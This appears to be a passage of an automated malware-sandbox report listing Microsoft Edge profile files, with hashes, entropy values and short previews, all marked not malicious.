C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	358860
Entropy (8bit):	5.32461967687626
Encrypted:	false
SSDEEP:	6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Ra:C1gAg1zfvC
MD5:	380931586072E3975B8FEDFC6EE0FD76
SHA1:	3AEEEDCED700B4B5FE6FDF76AC18F589F610C2C1
SHA-256:	CF0154DAFC2EF5A4D23C34F213325876CAE89FF978236C7DA42C7D7B4EBB4E44
SHA-512:	7CFAFD5741858545E17D893EF291937C1C0D676DC2606EF32FE0BCF88B326C2DF165E65DF6E29ACBC739B89D9A6434DAE5022399722CFB33B3687788F784EAD0
Malicious:	false
Preview:	{"aee_config":{"ar":{"price_regex":{"ae":"(((ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)))","dz":"(((dzd\|da\|\\x{062F}\\x{062C})\\s\\d{1,3})\|(\\d{1,3}\\s(dzd\|da\|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}\|egp)\\s\\d{1,3})\|(\\d{1,3}\\s(e\\x{00a3}\|egp)))","ma":"(((mad\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(mad\|dhs\|dh)))","sa":"((\\d{1,3}\\s(sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633}))\|((sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633})\\s\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})\|(\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})\|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})\|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	429
Entropy (8bit):	5.809210454117189
Encrypted:	false
SSDEEP:	6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
MD5:	5D1D9020CCEFD76CA661902E0C229087
SHA1:	DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
SHA-256:	B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
SHA-512:	5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
Malicious:	false
Preview:	{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\404de66d-1100-43c3-9c5c-d1af634e94fe.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\5a41d327-8530-4f89-ac14-874bf51fb483.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\6b899d47-5d8e-4f77-98e6-cf5e657a6129.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\6f7a8095-c525-4eea-b716-b6aa49d4c6ba.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	188
Entropy (8bit):	5.29005178380407
Encrypted:	false
SSDEEP:	3:YWRAWNjYCYk4WlPI0omRSSXmQh3wYHGKB8HQXwlm9yJUA6XcIR6RX77XMqZtVUL5:YWyWNsCn1lBv31dB8wXwlmUUAnIMp5bs
MD5:	50682845DCC61CEE17C47E86A5A3A413
SHA1:	4B6F298BFB9118CDDA3A4C7B8460546B42634437
SHA-256:	CF9D2C0BFBCE983ECF9DA6E0131B1D6F2F567CC38F3D0F79D2AC1C7CE14AFF99
SHA-512:	9BE7E17406EF74AD3C4A361B223B683DAD2716F160B8BEC8BD8F8E3C453882B97E66F6C6CCF009B9F71E5A50381AB47126B02A0FA74CB9C9BAA1100764BF3495
Malicious:	false
Preview:	{"sts":[{"expiry":1757152701.795593,"host":"8/RrMmQlCD2Gsp14wUCE1P8r7B2C5+yE0+g79IPyRsc=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1725616701.795598}],"version":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\87247d14-b208-4c95-a543-1e71219ecfd5.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF26596.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF27e2f.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF28850.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	188
Entropy (8bit):	5.29005178380407
Encrypted:	false
SSDEEP:	3:YWRAWNjYCYk4WlPI0omRSSXmQh3wYHGKB8HQXwlm9yJUA6XcIR6RX77XMqZtVUL5:YWyWNsCn1lBv31dB8wXwlmUUAnIMp5bs
MD5:	50682845DCC61CEE17C47E86A5A3A413
SHA1:	4B6F298BFB9118CDDA3A4C7B8460546B42634437
SHA-256:	CF9D2C0BFBCE983ECF9DA6E0131B1D6F2F567CC38F3D0F79D2AC1C7CE14AFF99
SHA-512:	9BE7E17406EF74AD3C4A361B223B683DAD2716F160B8BEC8BD8F8E3C453882B97E66F6C6CCF009B9F71E5A50381AB47126B02A0FA74CB9C9BAA1100764BF3495
Malicious:	false
Preview:	{"sts":[{"expiry":1757152701.795593,"host":"8/RrMmQlCD2Gsp14wUCE1P8r7B2C5+yE0+g79IPyRsc=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1725616701.795598}],"version":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\c54d2f5c-fa0a-4d97-a7e7-fa112dad67bd.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9593
Entropy (8bit):	5.111451683114912
Encrypted:	false
SSDEEP:	192:stmkdusl+eyaNP9kGw3s80bV+FE8QAnTIP9YJ:stmtsIetJfbG7Qa
MD5:	4DCABCFC28E7B5DA97767A9D85D4781E
SHA1:	9411E240D1AFD295C259A211DB0A94735E4FDC7A
SHA-256:	5EE106A325AB6193E1C351A6B70B5B844DE5806B9602A8039A2BB785636304BC
SHA-512:	ACD42CD394D3E00DCD43FC45796B2F27CFE9E3F41A5FB9F46D024A1648A78CED5C7C0A127EEB6929F53AE8AB9A620EAD7DE7A3368E19E6809D3B6A1B12D25326
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13370090291882678","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF29f43.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9593
Entropy (8bit):	5.111451683114912
Encrypted:	false
SSDEEP:	192:stmkdusl+eyaNP9kGw3s80bV+FE8QAnTIP9YJ:stmtsIetJfbG7Qa
MD5:	4DCABCFC28E7B5DA97767A9D85D4781E
SHA1:	9411E240D1AFD295C259A211DB0A94735E4FDC7A
SHA-256:	5EE106A325AB6193E1C351A6B70B5B844DE5806B9602A8039A2BB785636304BC
SHA-512:	ACD42CD394D3E00DCD43FC45796B2F27CFE9E3F41A5FB9F46D024A1648A78CED5C7C0A127EEB6929F53AE8AB9A620EAD7DE7A3368E19E6809D3B6A1B12D25326
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13370090291882678","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF2e9f8.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9593
Entropy (8bit):	5.111451683114912
Encrypted:	false
SSDEEP:	192:stmkdusl+eyaNP9kGw3s80bV+FE8QAnTIP9YJ:stmtsIetJfbG7Qa
MD5:	4DCABCFC28E7B5DA97767A9D85D4781E
SHA1:	9411E240D1AFD295C259A211DB0A94735E4FDC7A
SHA-256:	5EE106A325AB6193E1C351A6B70B5B844DE5806B9602A8039A2BB785636304BC
SHA-512:	ACD42CD394D3E00DCD43FC45796B2F27CFE9E3F41A5FB9F46D024A1648A78CED5C7C0A127EEB6929F53AE8AB9A620EAD7DE7A3368E19E6809D3B6A1B12D25326
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13370090291882678","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PriceComparison\PriceComparisonAssetStore.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PriceComparison\PriceComparisonAssetStore.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PriceComparison\PriceComparisonAssetStore.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	25185
Entropy (8bit):	5.5710414639592765
Encrypted:	false
SSDEEP:	768:9xdWqUWPnjfRI8F1+UoAYDCx9Tuqh0VfUC9xbog/OVWJ5KYrwVWingpqtun:9xdWqUWPnjfRIu1ja1zKJA6tg
MD5:	F5068A11B9AC4843936CEC8F14815101
SHA1:	4D415CC136C034E1CAED16C7B20C72DF252F2515
SHA-256:	268330CA26E2321B20BA5411CC50DDA98DEC803B4C305D216DD848F7E81B132A
SHA-512:	DBF4B7009C5998EB45DF6AAE37414FB16E1D6FA65FCA87C5A699E71CD2C00AA0E148E469BBDAF564EC72DFE0049C5931799A8887738156F58B76CCA106F2C9F6
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13370090291242821","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13370090291242821","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF2a53f.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	25185
Entropy (8bit):	5.5710414639592765
Encrypted:	false
SSDEEP:	768:9xdWqUWPnjfRI8F1+UoAYDCx9Tuqh0VfUC9xbog/OVWJ5KYrwVWingpqtun:9xdWqUWPnjfRIu1ja1zKJA6tg
MD5:	F5068A11B9AC4843936CEC8F14815101
SHA1:	4D415CC136C034E1CAED16C7B20C72DF252F2515
SHA-256:	268330CA26E2321B20BA5411CC50DDA98DEC803B4C305D216DD848F7E81B132A
SHA-512:	DBF4B7009C5998EB45DF6AAE37414FB16E1D6FA65FCA87C5A699E71CD2C00AA0E148E469BBDAF564EC72DFE0049C5931799A8887738156F58B76CCA106F2C9F6
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13370090291242821","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13370090291242821","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\5bc3e92c-237e-4b6d-82ee-6ceeced5003d.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\73fe6ae8-342c-4743-b05b-5a8e8d867d03.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
